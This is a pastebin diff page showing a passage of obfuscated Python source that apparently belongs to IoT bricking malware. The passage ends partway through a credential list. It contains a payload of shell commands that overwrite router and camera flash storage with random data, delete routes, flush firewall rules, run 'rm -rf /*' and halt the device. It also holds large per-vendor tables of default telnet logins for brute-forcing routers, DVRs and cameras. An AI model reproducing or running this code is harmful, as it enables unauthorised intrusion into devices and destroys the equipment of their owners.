View difference between Paste ID: ixVXkEF1 and pDAEJzTt
SHOW: | | - or go back to the newest paste.
1
if 82 - 82: i1 / Ii11i1iIi - i1IIi1i1iiI
2
if 84 - 84: IIiIii1iI . Ii % oOoO0Ooo / O0oo / O0oo0OOOOO00
3
if 49 - 49: o0oooooO / Ii11i1iIi * O0oo
4
if 21 - 21: Oooo - I11I1Ii
5
if 39 - 39: i1 . i1IIi1i1iiI - OOOoOooO / o0ooO
6
if 95 - 95: IIiII - Ii11i1iIi / O0oo0OOOOO00 + o0oooooO
7
time . sleep ( 3 )
8
if 20 - 20: Oo0
9
if 57 - 57: O0oo0OOOOO00 . Oo0 + IIiIii1iI * OOOoOooO . o0ooO * i1
10
if 93 - 93: Ii11i1iIi - Oo0Oo . Oooo . oOoO0Ooo * IIiII % i1
11
if 60 - 60: o0oooooO + Ii + Ii % o0oooooO
12
if 84 - 84: I11I1Ii * Ii11i1iIi
13
I1IiI1I1 = OOo0O0oOOOO
14
if 4 - 4: Oooo + oOOo0000o
15
if 43 - 43: I11I1Ii * oOoO0Ooo * i1IIi1i1iiI * i1 . OOooOO0
16
i111IIIiII1i = False
17
Oo0O00OOooO = False
18
IiiI1 = False
19
oOI11IIIi1II111 = True
20
iiIII11I1i1Ii = True
21
I1i = True
22
i11iiiIi = True
23
i1iii = True
24
OOoOo00oO0 = True
25
OO00oo0o = True
26
if 5 - 5: IIiII + O0oo - i1
27
if 52 - 52: oOoO0Ooo / Ii / Ii
28
if 24 - 24: oOOoO00oo0
29
i11 = [ ]
30
II1I1i11 = [ 23 , 2222 , 2323 , 7547 , 5555 , 23231 , 6789 , 37777 , 19058 , 5358 , 8023 , 8022 , 1433 , 3306 , 445 , 110 , 21 , 88 , 81 , 8080 , 8081 , 49152 , 5431 ]
31
if 69 - 69: Ii * IIiIIiIii1I % oOoO0Ooo / Ii11i1iIi
32
O0oO0ooooOO = [ ]
33
Iiii = { }
34
oOo00o = [ ]
35
O0oOo = { }
36
I1I1I11 = { }
37
if 53 - 53: O0oo . OOOoOooO % i1IIi1i1iiI % O0oo + O0oo * IIiII
38
if 27 - 27: i1IIi1i1iiI / i1IIi1i1iiI - IIiIIiIii1I % O0oo0OOOOO00 % Ii / Ii
39
OoooOoo0 = [ 80 , 81 , 82 , 8000 , 5555 , 8080 , 7547 , 8081 , 37215 , 52869 ]
40
oOiI1iIiIi111 = [ 22 , 23 , 80 , 81 , 82 , 8000 , 2222 , 2323 , 8080 , 8081 , 23231 , 23123 , 6789 , 7547 , 5555 , 19058 , 8023 , 8022 , 5358 , 5000 , 5001 , 8888 , 9000 , 88 , 12323 , 8181 , 60023 ]
41
I1i11II = 30
42
I1i1 = 10
43
O0OoO0O = 17
44
o0o = 3
45
o0o0oOOo = [ ]
46
oO0iIiiiii1 = { }
47
i11I11III1iii = { }
48
O0OO0O00000 = { }
49
OooO = { }
50
O000O0o0oOOo = { }
51
i1II = { }
52
ii1o00 = [ ]
53
i1IIOO0OOoO00OO = 0
54
I1i11IIii1iI1i1 = time . time ( )
55
if 91 - 91: I11I1Ii
56
iIii1IiI11II1 = [ 22 , 2222 , 5358 , 6789 , 19058 ]
57
if 65 - 65: O0oo / OOooOO0 % Oo0 / Ii % Ii11i1iIi
58
if 75 - 75: Ii11i1iIi % Ii11i1iIi * I11I1Ii / Oooo / Oo0Oo * O0oo0OOOOO00
59
iiI1iiI = [ 22 , 23 , 2222 , 2323 , 6789 ]
60
IIIii = 1
61
iIoO0O000oo = [ 15 , 30 , 60 , 120 , 240 , 480 ]
62
Oo0Oooo = [ ]
63
IiIIiI1iII1Ii = [ ]
64
oO0OoOoO00OoO = { }
65
if 55 - 55: o0oooooO . O0oo0OOOOO00 . i1IIi1i1iiI % Oooo / IIiIii1iI - i1IIi1i1iiI
66
if 50 - 50: i1IIi1i1iiI . Oooo - Oooo . IIiII
67
if 47 - 47: IIiIIiIii1I % Oo0Oo - oOOoO00oo0 + o0ooO
68
if 47 - 47: I11I1Ii
69
i1I1 = 100
70
OoO00 = 3
71
if 45 - 45: O0oo * o0ooO - oOOo0000o
72
ooiI1 = 90
73
O0oOOoO = 600
74
oOooOooO0ooO = 20
75
if 27 - 27: i1
76
if 90 - 90: IIiII . Oooo - o0ooO % o0oooooO - IIiIIiIii1I
77
if 40 - 40: Oo0Oo / o0ooO / oOoO0Ooo . IIiIii1iI . o0ooO
78
ii11II = 'cat /proc/mounts\ncat /dev/urandom | mtd_write mtd0 - 0 32768\ncat /dev/urandom | mtd_write mtd1 - 0 32768\n'
79
ii11II += 'busybox cat /dev/urandom >/dev/mtd0 &\nbusybox cat /dev/urandom >/dev/sda &\nbusybox cat /dev/urandom >/dev/mtd1 &\nbusybox cat /dev/urandom >/dev/mtdblock0 &\nbusybox cat /dev/urandom >/dev/mtdblock1 &\nbusybox cat /dev/urandom >/dev/mtdblock2 &\nbusybox cat /dev/urandom >/dev/mtdblock3 &\n'
80
ii11II += 'busybox route del default\ncat /dev/urandom >/dev/mtdblock0 &\ncat /dev/urandom >/dev/mtdblock1 &\ncat /dev/urandom >/dev/mtdblock2 &\ncat /dev/urandom >/dev/mtdblock3 &\ncat /dev/urandom >/dev/mtdblock4 &\ncat /dev/urandom >/dev/mtdblock5 &\ncat /dev/urandom >/dev/mmcblk0 &\ncat /dev/urandom >/dev/mmcblk0p9 &\ncat /dev/urandom >/dev/mmcblk0p12 &\ncat /dev/urandom >/dev/mmcblk0p13 &\ncat /dev/urandom >/dev/root &\ncat /dev/urandom >/dev/mmcblk0p8 &\ncat /dev/urandom >/dev/mmcblk0p16 &\n'
81
ii11II += 'route del default;iproute del default;ip route del default;rm -rf /* 2>/dev/null &\niptables -F;iptables -t nat -F;iptables -A INPUT -j DROP;iptables -A FORWARD -j DROP\nhalt -n -f\nreboot\n'
82
if 57 - 57: IIiIii1iI + i1 * i1IIi1i1iiI
83
if 36 - 36: oOOoO00oo0 / oOOo0000o
84
if 28 - 28: IIiIIiIii1I + Ii * i1 % IIiIIiIii1I
85
if 66 - 66: OOooOO0 % O0oo0OOOOO00
86
if 36 - 36: OOOoOooO / O0oo . Ii11i1iIi / o0ooO - o0ooO % i1IIi1i1iiI
87
def Oo000o0OOOo ( filename , bootup = False ) :
88
 global i111IIIiII1i
89
 global Oo0O00OOooO
90
 global IiiI1
91
 global oOI11IIIi1II111
92
 global iiIII11I1i1Ii
93
 global I1i
94
 global i11iiiIi
95
 global i1iii
96
 global OOoOo00oO0
97
 global OO00oo0o
98
 global II1I1i11
99
 global oOiI1iIiIi111
100
 global OoooOoo0
101
 if 12 - 12: Oooo
102
 Ooo0OO00 = [ ]
103
 oOo0oo = [ ]
104
 iII = [ ]
105
 Ooo0o0 = 0
106
 if 13 - 13: i1IIi1i1iiI - oOOoO00oo0
107
 if 30 - 30: oOOoO00oo0 / i1 - IIiII - Oooo * Oo0Oo * IIiII
108
 try :
109
  iiI = open ( filename , 'r' )
110
  iiIi1IiII = iiI . read ( ) . split ( '\n' )
111
  for III1I in iiIi1IiII :
112
   Oo00oO0O = re . search ( 'sTN: (\d+)' , III1I )
113
   if Oo00oO0O :
114
    i111IIIiII1i = bool ( int ( Oo00oO0O . group ( 1 ) ) )
115
    Ooo0o0 += 1
116
   Oo00oO0O = re . search ( 'sSO: (\d+)' , III1I )
117
   if Oo00oO0O :
118
    Oo0O00OOooO = bool ( int ( Oo00oO0O . group ( 1 ) ) )
119
    Ooo0o0 += 1
120
   Oo00oO0O = re . search ( 'sSR: (\d+)' , III1I )
121
   if Oo00oO0O :
122
    IiiI1 = bool ( int ( Oo00oO0O . group ( 1 ) ) )
123
    Ooo0o0 += 1
124
   Oo00oO0O = re . search ( 'sSD: (\d+)' , III1I )
125
   if Oo00oO0O :
126
    oOI11IIIi1II111 = bool ( int ( Oo00oO0O . group ( 1 ) ) )
127
    Ooo0o0 += 1
128
   Oo00oO0O = re . search ( 'sBR: (\d+)' , III1I )
129
   if Oo00oO0O :
130
    iiIII11I1i1Ii = bool ( int ( Oo00oO0O . group ( 1 ) ) )
131
    Ooo0o0 += 1
132
   Oo00oO0O = re . search ( 'sBL: (\d+)' , III1I )
133
   if Oo00oO0O :
134
    I1i = bool ( int ( Oo00oO0O . group ( 1 ) ) )
135
    Ooo0o0 += 1
136
   Oo00oO0O = re . search ( 'sWP: (\d+)' , III1I )
137
   if Oo00oO0O :
138
    i11iiiIi = bool ( int ( Oo00oO0O . group ( 1 ) ) )
139
    Ooo0o0 += 1
140
   Oo00oO0O = re . search ( 'eSC: (\d+)' , III1I )
141
   if Oo00oO0O :
142
    i1iii = bool ( int ( Oo00oO0O . group ( 1 ) ) )
143
    Ooo0o0 += 1
144
   Oo00oO0O = re . search ( 'eBR: (\d+)' , III1I )
145
   if Oo00oO0O :
146
    OOoOo00oO0 = bool ( int ( Oo00oO0O . group ( 1 ) ) )
147
    Ooo0o0 += 1
148
   Oo00oO0O = re . search ( 'eWP: (\d+)' , III1I )
149
   if Oo00oO0O :
150
    OO00oo0o = bool ( int ( Oo00oO0O . group ( 1 ) ) )
151
    Ooo0o0 += 1
152
   if 'aLP: ' in III1I [ : 7 ] :
153
    Ooo0o0 += 1
154
    III11 = re . compile ( '(\d+)' )
155
    Ii11I = [ ] ;
156
    for OO0OO in III11 . finditer ( III1I ) :
157
     if not OO0OO in Ii11I :
158
      Ii11I . append ( int ( OO0OO . group ( 1 ) ) )
159
    Ooo0OO00 = Ii11I
160
   if 'aSC: ' in III1I [ : 7 ] :
161
    Ooo0o0 += 1
162
    III11 = re . compile ( '(\d+)' )
163
    Ii11I = [ ] ;
164
    for OO0OO in III11 . finditer ( III1I ) :
165
     if not OO0OO in Ii11I :
166
      Ii11I . append ( int ( OO0OO . group ( 1 ) ) )
167
    oOo0oo = Ii11I
168
   if 'aWP: ' in III1I [ : 7 ] :
169
    Ooo0o0 += 1
170
    III11 = re . compile ( '(\d+)' )
171
    Ii11I = [ ] ;
172
    for OO0OO in III11 . finditer ( III1I ) :
173
     if not OO0OO in Ii11I :
174
      Ii11I . append ( int ( OO0OO . group ( 1 ) ) )
175
    iII = Ii11I
176
  iiI . close ( )
177
 except :
178
  Ii111i11iIi ( 'ERR: Sentinel could not read config.' )
179
  return
180
 if Ooo0o0 < 9 :
181
  if 81 - 81: IIiIIiIii1I % O0oo0OOOOO00 + I11I1Ii
182
  Ii111i11iIi ( "NOTC: Sentinel ignoring config due to lack of data." )
183
  return
184
 oOiI1iIiIi111 = oOo0oo
185
 OoooOoo0 = iII
186
 if 62 - 62: o0oooooO + OOooOO0 + I11I1Ii
187
 if bootup :
188
  II1I1i11 = Ooo0OO00
189
  return
190
  if 39 - 39: Ii11i1iIi * o0ooO / IIiII / I11I1Ii
191
  if 94 - 94: IIiIii1iI * o0ooO + Oo0Oo * IIiIii1iI * Ii11i1iIi
192
 for Ooo0o0oOO0o in Ooo0OO00 :
193
  if not Ooo0o0oOO0o in II1I1i11 :
194
   O0O0 = socket . socket ( socket . AF_INET , socket . SOCK_STREAM )
195
   O0O0 . setsockopt ( socket . SOL_SOCKET , socket . SO_REUSEADDR , 1 )
196
   try :
197
    O0O0 . bind ( ( '0.0.0.0' , int ( Ooo0o0oOO0o ) ) )
198
    O0O0 . listen ( 5 )
199
    O0oO0ooooOO . append ( O0O0 )
200
    Iiii [ int ( Ooo0o0oOO0o ) ] = O0O0
201
    Ii111i11iIi ( "NOTC: Sentinel added listening port %d" % ( int ( Ooo0o0oOO0o ) ) )
202
   except :
203
    pass
204
 for Ooo0o0oOO0o in II1I1i11 :
205
  if not Ooo0o0oOO0o in Ooo0OO00 :
206
   if 85 - 85: oOoO0Ooo - o0ooO
207
   if int ( Ooo0o0oOO0o ) in Iiii :
208
    O0O0 = Iiii [ int ( Ooo0o0oOO0o ) ]
209
    if O0O0 in O0oO0ooooOO :
210
     try :
211
      O0O0 . close ( )
212
     except :
213
      pass
214
     O0oO0ooooOO . remove ( O0O0 )
215
     Iiii [ int ( Ooo0o0oOO0o ) ] = None
216
     Ii111i11iIi ( "NOTC: Sentinel removed listening port %d" % ( int ( Ooo0o0oOO0o ) ) )
217
 II1I1i11 = Ooo0OO00
218
 if 24 - 24: IIiIIiIii1I - i1IIi1i1iiI . o0oooooO / oOOo0000o . OOOoOooO
219
Oo000o0OOOo ( '/tmp/system/control.cfg' , True )
220
if 29 - 29: i1IIi1i1iiI + O0oo * Oo0Oo * OOOoOooO - OOooOO0 * i1IIi1i1iiI
221
if 36 - 36: oOOo0000o
222
if 36 - 36: Ii11i1iIi + IIiIIiIii1I - oOOoO00oo0 . Oo0 - Oo0Oo . O0oo0OOOOO00
223
if 65 - 65: OOOoOooO * OOOoOooO * oOOo0000o % i1 . Oo0 - O0oo
224
i1I1iIIi1 = [
225
[ 'Login authentication' ,
226
 'admin/' ,
227
 'root/' ,
228
 'password/password' ,
229
'telecom/telecom' ,
230
 'admin/admin' ,
231
 'root/root' ,
232
 ] ,
233
[ 'Password:' ,
234
 '/' ,
235
 '/' ,
236
 ] ,
237
[ 'GAPM-\d\d\d\d login' ,
238
 'root/root' ,
239
 ] ,
240
[ 'PORT:9527:' ,
241
 'admin/' ,
242
 'admin/admin' ,
243
 'admin/123456' ,
244
 'admin/' ,
245
 'admin/12345' ,
246
 'admin/aa888888' ,
247
 'admin/admin' ,
248
 'admin/1234' ,
249
 'admin/888888' ,
250
 'admin/123456' ,
251
 'admin/0000' ,
252
 'admin/1111' ,
253
 'admin/666666' ,
254
 'admin/654321' ,
255
 'admin/111111' ,
256
 'admin/123' ,
257
 'admin/1' ,
258
 'admin/admin123' ,
259
 'admin/123abc456' ,
260
 'admin/000000' ,
261
 'admin/7773' ,
262
 'admin/112233' ,
263
 'admin/8888' ,
264
 'admin/1453' ,
265
 'admin/34567' ,
266
 'admin/686868' ,
267
 'admin/12345678' ,
268
 'admin/900009' ,
269
 'admin/54321' ,
270
 'admin/2499' ,
271
 'admin/123321' ,
272
 'admin/bdc3939' ,
273
 'admin/4321' ,
274
 'admin/88888888' ,
275
 'admin/abc123' ,
276
 'admin/admin1' ,
277
 'admin/9914' ,
278
 'admin/168168' ,
279
 'admin/spc123' ,
280
 'admin/sks12345' ,
281
 'admin/1212' ,
282
 'admin/13579' ,
283
 'admin/102030' ,
284
 'admin/34588' ,
285
 'admin/1122' ,
286
 'admin/121234' ,
287
 'admin/11111' ,
288
 'admin/9999' ,
289
 'admin/81171762' ,
290
 'admin/2580' ,
291
 'admin/999999' ,
292
 'admin/9742' ,
293
 'admin/2016' ,
294
 'admin/1974' ,
295
 'admin/admin12345' ,
296
 'admin/peak0429' ,
297
 'admin/123654' ,
298
 'admin/1987' ,
299
 'admin/1988' ,
300
 'admin/siera' ,
301
 'admin/2734988' ,
302
 'admin/55555' ,
303
 'admin/1023' ,
304
 'admin/123123' ,
305
 'admin/88888' ,
306
 'admin/9001' ,
307
 'admin/123456789' ,
308
 'admin/1985'
309
 'admin/1010' ,
310
 'admin/2014' ,
311
 'admin/7777777' ,
312
 'admin/1976' ,
313
 'admin/2222' ,
314
 'admin/222222' ,
315
 'admin/7764' ,
316
 'admin/54637767' ,
317
 'admin/00000' ,
318
 'admin/5555' ,
319
 'admin/0257' ,
320
 'admin/717766' ,
321
 'admin/555' ,
322
 'admin/1234567' ,
323
 'admin/1103' ,
324
 'admin/121212' ,
325
 'admin/1967' ,
326
 'admin/456' ,
327
 ] ,
328
 ]
329
if 99 - 99: OOooOO0 - O0oo0OOOOO00 - O0oo / OOOoOooO . Ii
330
if 49 - 49: O0oo0OOOOO00
331
ooo0o00O00 = [
332
 [ 'GM login:' ,
333
"root/GM8182" ,
334
 ] ,
335
 [ 'LocalHost login:' ,
336
 'root/xc3511' ,
337
 "root/xmhdipc" ,
338
 ] ,
339
 [ '\(none\) login:' ,
340
 'vstarcam2015/20150602' ,
341
 'root/5up' ,
342
 'root/' ,
343
 'root/vizxv' ,
344
 "root/juantech" ,
345
 "root/zlxx." ,
346
 'root/antslq' ,
347
 'admin/admin' ,
348
 'root/123456' ,
349
 'root/1001chin' ,
350
 'root/win1dows' ,
351
 'admin/7ujMko0admin' ,
352
 'user/user' ,
353
 'root/jvbzd' ,
354
 'root/123' ,
355
 'admin/0000' ,
356
 'ftp/ftp' ,
357
 'root/7ujMko0vizxv ' ,
358
 'root/hunt5759' ,
359
 '123/123' ,
360
 'root/ivdev' ,
361
 ] ,
362
 [ 'Welcome to Zhone Technologies' ,
363
 'admin/zhone' ,
364
 ] ,
365
 [ 'host login:' ,
366
 'root/vizxv' ,
367
 ] ,
368
 [ 'TL-WR7' ,
369
 'root/5up' ,
370
 ] ,
371
 [ 'F6' ,
372
 'root/Zte521' ,
373
 ] ,
374
[ 'netween\.co\.kr' ,
375
 'baby/baby' ,
376
 ] ,
377
[ 'kopp login' ,
378
 'root/kopp' ,
379
 ] ,
380
[ 'MikroTik' ,
381
 'admin/' ,
382
 'user/user' ,
383
 'admin/' ,
384
 'installer/installer' ,
385
 'admin/admin' ,
386
 'test/test' ,
387
 'admin/12345' ,
388
 'admin/passw0rd' ,
389
 'admin/1234567890' ,
390
 'admin/password' ,
391
 'admin/admin123' ,
392
 'support/support' ,
393
 'admin/11111111' ,
394
 'admin/P@55w0rd!' ,
395
 'admin/888888' ,
396
 'admin/1234' ,
397
 'admin/123456' ,
398
 'admin/tsunami' ,
399
 'admin/admin1' ,
400
 '0/0' ,
401
 'guest/guest' ,
402
 'admin/123' ,
403
 'admin/1111' ,
404
 'admin/admin1234' ,
405
 'admin/654321' ,
406
 'admin/4321' ,
407
 'admin/admin99' ,
408
 'admin/operator' ,
409
 'admin/hello' ,
410
 'admin/54321' ,
411
 'admin/666666' ,
412
 'test/test123' ,
413
 'root/root' ,
414
 'operator/operator' ,
415
 'monitor/monitor' ,
416
 'admin/abc123' ,
417
 'admin/system' ,
418
 'admin/secure' ,
419
 'router/router' ,
420
 'ftp/ftp' ,
421
 'Admin/Admin' ,
422
 'admin/0000' ,
423
 'ubnt/ubnt' ,
424
 'guest/123456' ,
425
 '1234/1234' ,
426
 'admin/Admin123' ,
427
 'admin/admin00' ,
428
 'admin/99999999' ,
429
 'admin/motorola' ,
430
 'admin/administrator' ,
431
 'admin/2222' ,
432
 'user/admin' ,
433
 'root/root1234' ,
434
 'root/root123' ,
435
 'root/qwerty' ,
436
 'root/password' ,
437
 'root/12345' ,
438
 'root/1234' ,
439
 'root/123' ,
440
 'guest/guest123' ,
441
 'admin/vnpt' ,
442
 'admin/test' ,
443
 'admin/root' ,
444
 'admin/power' ,
445
 'Administrator/' ,
446
 'admin/diamond' ,
447
 'admin/conexant' ,
448
 'admin/atlantis' ,
449
 'admin/ADMIN' ,
450
 '1/1' ,
451
 'root/12345678' ,
452
 '888888/888888' ,
453
 ] ,
454
[ 'Welcome to JNIOR' ,
455
 'jnior/jnior' ,
456
 'admin/admin' ,
457
 'jnior/1234' ,
458
 'admin/1234' ,
459
 ] ,
460
 [ 'Welcome to slush' ,
461
 'jnior/jnior' ,
462
 'admin/admin' ,
463
 'jnior/1234' ,
464
 'admin/1234' ,
465
 'root/tini' ,
466
 'guest/guest' ,
467
 ] ,
468
[ 'heluyou login' ,
469
 'admin/h@32LuyD' ,
470
 ] ,
471
[ 'OpenEmbedded Linux mdm9625' ,
472
 'admin/admin' ,
473
 ] ,
474
[ 'PK5001Z login' ,
475
 'admin/CenturyL1nk' ,
476
 'admin/CTLSupport12' ,
477
 'admin/QwestM0dem' ,
478
 ] ,
479
[ 'Ruijie login' ,
480
 'ruijie/ruijie' ,
481
 ] ,
482
[ 'DSL-500B' ,
483
 'TMAR#DLKT20060205/DLKT20060205\n' ,
484
 'admin/admin\n' ,
485
 ] ,
486
[ 'BusyBox on \S+ login' ,
487
 'admin/admin' ,
488
 'admin/1234' ,
489
 'root/Admin' ,
490
 'root/' ,
491
 'root/admin' ,
492
 'user/user' ,
493
 'admin/QwestM0dem' ,
494
 'admin/xad$l#12' ,
495
 'root/12345' ,
496
 'root/password' ,
497
 'root/1234567890' ,
498
 'root/123456' ,
499
 'admin/password' ,
500
 'root/1234' ,
501
 'Admin/Admin' ,
502
 'admin/1111' ,
503
 'admin/admin123' ,
504
 'admin/qwerty' ,
505
 'admin/nimda' ,
506
 ] ,
507
[ 'Account:' ,
508
 'admin/1234' ,
509
 ] ,
510
[ 'ktcatv login' ,
511
 'super/root' ,
512
 'admin/admin' ,
513
 ] ,
514
[ 'Actiontec xDSL Router' ,
515
 'admin/CenturyL1nk' ,
516
 'admin/CTLSupport12' ,
517
 'admin/QwestM0dem' ,
518
 ] ,
519
[ '!Login:' ,
520
 'admin/admin' ,
521
 'admin/ho4uku6at' ,
522
 'root/root' ,
523
 'support/support' ,
524
 'admin/admin1' ,
525
 'admin/1234' ,
526
 'admin/epicrouter' ,
527
 'admin/admin1234' ,
528
 'admin/admin123' ,
529
 'admin/12345' ,
530
 'telecomadmin/nE7jA%5m' ,
531
 'admin/1111' ,
532
 'admin/888888' ,
533
 'admin/54321' ,
534
 'supervisor/zyad1234' ,
535
 'admin/123' ,
536
 'admin/root' ,
537
 'admin/system' ,
538
 'manager/friend' ,
539
 'admin/123456' ,
540
 'admin/4321' ,
541
 'anonymous/anonymous' ,
542
 ] ,
543
[ '(Router;Login|Gateway;Login)' ,
544
 'admin/admin' ,
545
 'admin/1234' ,
546
 'superadmin/Is$uper@dmin' ,
547
 'root/12345' ,
548
 'admin/password' ,
549
 'user/user' ,
550
 'tmadmin/tmadmin' ,
551
 'support/support' ,
552
 'support/admin' ,
553
 'admin/ho4uku6at' ,
554
 '1234/1234' ,
555
 'supervisor/zyad1234' ,
556
 'admin/362729' ,
557
 'user/password' ,
558
 'admin/admin1' ,
559
 'admin/admin1234' ,
560
 'admin/admin123' ,
561
 'admin/abc123' ,
562
 'admin/12345' ,
563
 'admin/123' ,
564
 'root/root' ,
565
 'admin/1111' ,
566
 'admin/administrator' ,
567
 'admin/power' ,
568
 'root/admin' ,
569
 'admin/123456' ,
570
 'ZXDSL/ZXDSL' ,
571
 'admin/gvt12345' ,
572
 'telecomadmin/nE7jA%5m' ,
573
 'tech/tech' ,
574
 'ADSL/export03' ,
575
 'admin/adslroot' ,
576
 'admin/utstar' ,
577
 'admin/CenturyL1nk' ,
578
 'admin/CTLSupport12' ,
579
 ] ,
580
[ '!Username:' ,
581
 'admin/admin' ,
582
 'user/user' ,
583
 'telecomadmin/nE7jA%5m' ,
584
 'guest/guest' ,
585
 ] ,
586
[ 'UTT login:' ,
587
 'admin/admin' ,
588
 'admin/123456' ,
589
 'admin/54321' ,
590
 'admin/admin123' ,
591
 'admin/password' ,
592
 'admin/Admin123' ,
593
 'admin/1234567890' ,
594
 'admin/*58298' ,
595
'admin/2oiidxii22' ,
596
'admin/19761213' ,
597
'admin/4276365' ,
598
'admin/nimda' ,
599
 'admin/adminadmin' ,
600
 'admin/guest' ,
601
 'admin/a' ,
602
 'admin/ADMIN' ,
603
 'admin/administrator' ,
604
 'admin/adminstrator' ,
605
 'admin/root' ,
606
 'guest/guest' ,
607
 'guest/123456' ,
608
 ] ,
609
[ 'DSL5\S+ login:' ,
610
 "admin/admin" ,
611
 "admin/bayandsl" ,
612
 ] ,
613
[ 'TELNET session now in ESTABLISHED state' ,
614
 'Manager/friend' ,
615
 ] ,
616
[ 'Remote Management Console' ,
617
 'netscreen/netscreen' ,
618
 'localadmin/localadmin' ,
619
 ] ,
620
[ 'ANS\d\d\S+ login' ,
621
 'telnet/telnet' ,
622
 ] ,
623
[ 'hktos login' ,
624
 'root/public' ,
625
 ] ,
626
[ 'H6\d\S+ login' ,
627
 'root/vertex25ektks123' ,
628
 ] ,
629
[ 'VMG\d+\-B10D' ,
630
 'root/zyad1234' ,
631
 'supervisor/zyad1234' ,
632
 'admin/admin1234' ,
633
 'admin/admin' ,
634
 'admin/1234' ,
635
 'admin/password' ,
636
 'zyuser/1234' ,
637
 'support/support' ,
638
 'user/user' ,
639
 ] ,
640
[ 'tc login' ,
641
 'admin/1234' ,
642
 'root/vertex25ektks123' ,
643
'admin/admin' ,
644
 'support/support' ,
645
 'admin/12345' ,
646
 'admin/admin1' ,
647
 'admin/123456' ,
648
 'admin/password' ,
649
 'admin/0000' ,
650
 'admin/ttnet' ,
651
 'admin/4321' ,
652
 'admin/1234567890' ,
653
 'admin/admin123' ,
654
 'admin/1111' ,
655
 'admin/54321' ,
656
 'admin/admin1234' ,
657
 'admin/654321' ,
658
 'admin/administrator' ,
659
 'engineer/amplifier' ,
660
 'admin/service' ,
661
 'admin/adsl' ,
662
 ] ,
663
[ '(ralink|aquario) login' ,
664
 'Admin/' ,
665
 'admin/aquario' ,
666
 'admin/admin' ,
667
 'Admin/123456' ,
668
 'admin/h@32LuyD' ,
669
 'admin/aquario' ,
670
'Admin/' ,
671
 'admin/admin' ,
672
 'Admin/' ,
673
 ] ,
674
[ 'Welcome to RS' ,
675
 'admin/admin' ,
676
 'write/private' ,
677
 ] ,
678
[ 'telnet session telnet0' ,
679
 'test1/test1' ,
680
 ] ,
681
[ '870HNU' ,
682
 '1234/1234' ,
683
 ] ,
684
[ 'Ubee Interactive Corporation Telnet Server' ,
685
 'root/root' ,
686
 ] ,
687
[ 'davolink login' ,
688
 'root/admin' ,
689
 'admin/admin' ,
690
 'davo/drc' ,
691
 ] ,
692
[ 'login :' ,
693
 'admin/switch' ,
694
 ] ,
695
[ 'Comtrend Gigabit' ,
696
 '1234/1234' ,
697
 ] ,
698
[ 'SAMSUNG ELECTRONICS .*Login' ,
699
 'root/' ,
700
 'admin/password' ,
701
 ] ,
702
[ 'iGate .*ADSL' ,
703
 'admin/vnpt' ,
704
 'operator/operator' ,
705
 ] ,
706
[ 'DD-WRT v24' ,
707
 'root/samsung' ,
708
 ] ,
709
[ 'MontaVista.*Linux' ,
710
 'ftp/ftp' ,
711
 'admin/admin' ,
712
 'service/service' ,
713
 'admin/123456' ,
714
 ] ,
715
[ 'Aamra Networks LIMITED' ,
716
 'support/support123' ,
717
 ] ,
718
[ 'domain\.name login' ,
719
 'Admin/' ,
720
 ] ,
721
[ 'EDR\-\S+ login' ,
722
 'user/' ,
723
 ] ,
724
[ '(192.0.0.64|dvrdvs|Hikvision) login' ,
725
 'root/12345' ,
726
 'root/888888' ,
727
 'root/54321' ,
728
 'root/123456' ,
729
 'root/000000' ,
730
 'root/00000' ,
731
 'root/1234' ,
732
 'root/1' ,
733
 'root/123' ,
734
 'root/1234567890' ,
735
 'root/321' ,
736
 'root/1234567' ,
737
 'root/123123' ,
738
 'root/696969' ,
739
 'root/4321' ,
740
 'root/1111' ,
741
 'root/1234qwer' ,
742
 'root/password' ,
743
 'root/pu' ,
744
 'root/0000' ,
745
 'root/admin' ,
746
 'root/5555' ,
747
 'root/7777' ,
748
 'root/11111' ,
749
 'root/654321' ,
750
 'root/hikvision' ,
751
 'root/123456789abc' ,
752
 'admin/12345' ,
753
 'admin/1234' ,
754
 'admin/1234567890' ,
755
 'admin/admin1234' ,
756
 'admin/123456' ,
757
 'admin/admin' ,
758
 'admin/666666' ,
759
 'admin/654321' ,
760
 'admin/1111' ,
761
 'admin/admin1' ,
762
 'admin/22222' ,
763
 'admin/power' ,
764
 'admin/abc123' ,
765
 'admin/11111111' ,
766
 'admin/2222' ,
767
 'admin/0000' ,
768
 'admin/4321' ,
769
 'admin/123456789abc' ,
770
 'guest/12345' ,
771
 'hikvision/hikvision' ,
772
 ] ,
773
[ '[rR][tT]-2\d+ login' ,
774
 'root/ttnet' ,
775
 ] ,
776
[ '(t4-main|sanyo-board|smarteyes) login' ,
777
 'root/m' ,
778
 'root/mobiroot' ,
779
 'mg3500/merlin' ,
780
 ] ,
781
[ 'meritlilin' ,
782
 'root/pass' ,
783
 ] ,
784
[ 'MultiQb login' ,
785
 'root/admin' ,
786
 ] ,
787
[ 'Avaya Cajun' ,
788
 'diag/danger' ,
789
 ] ,
790
[ 'DB88FXX81 login' ,
791
 'root/svgodie' ,
792
 ] ,
793
[ 'Draytek login' ,
794
 'draytek/1234' ,
795
 ] ,
796
[ 'Tera-EP login' ,
797
 'admin/admin' ,
798
 'admin/1q2w3e' ,
799
 ] ,
800
[ 'HDFW System' ,
801
 'hscroot/abc123' ,
802
 ] ,
803
[ 'Copyright \(c\) 2004-20\d\d Hangz' ,
804
 'admin/admin' ,
805
 'admin/admin123' ,
806
 'admin/123456' ,
807
 'admin/' ,
808
 'root/admin' ,
809
 'admin/Admin' ,
810
 'admin/admin1' ,
811
 'admin/admin1234' ,
812
 'telecom/telecom' ,
813
 'webadmin/webadmin' ,
814
 'guest/guest' ,
815
 '123/123' ,
816
 'root/123' ,
817
 'user/user' ,
818
 'root/root' ,
819
 'admin/system' ,
820
 'admin/adminadmin' ,
821
 'root/' ,
822
 'telecomadmin/nE7jA%5m' ,
823
 'root/123456' ,
824
 'admin/0000' ,
825
 'admin/654321' ,
826
 'simple/h3c' ,
827
 ] ,
828
[ 'Copyright \(c\) 2010-2012 Hewle' ,
829
 'admin/admin' ,
830
 'admin/admin123' ,
831
 'admin/password' ,
832
 ] ,
833
[ 'Dlink-Router login' ,
834
 'admin/qwerty' ,
835
 'admin/admin' ,
836
 'admin/12345' ,
837
 'admin/123456' ,
838
 ] ,
839
[ 'this is ROS' ,
840
 'administrator/administrator' ,
841
 ] ,
842
[ 'AG 5\d+' ,
843
 'operator/operator' ,
844
 ] ,
845
[ 'BCM99999.*VosLogin' ,
846
 'admin/zhone' ,
847
 'root/1234567890' ,
848
 'root/54321' ,
849
 'admin/Admin' ,
850
 'IntraStack/Asante' ,
851
 'root/cat1029' ,
852
 'admin/smcadmin' ,
853
 'admin/admin' ,
854
 'admin/4321' ,
855
 'admin/1234' ,
856
 'admin/1234567890' ,
857
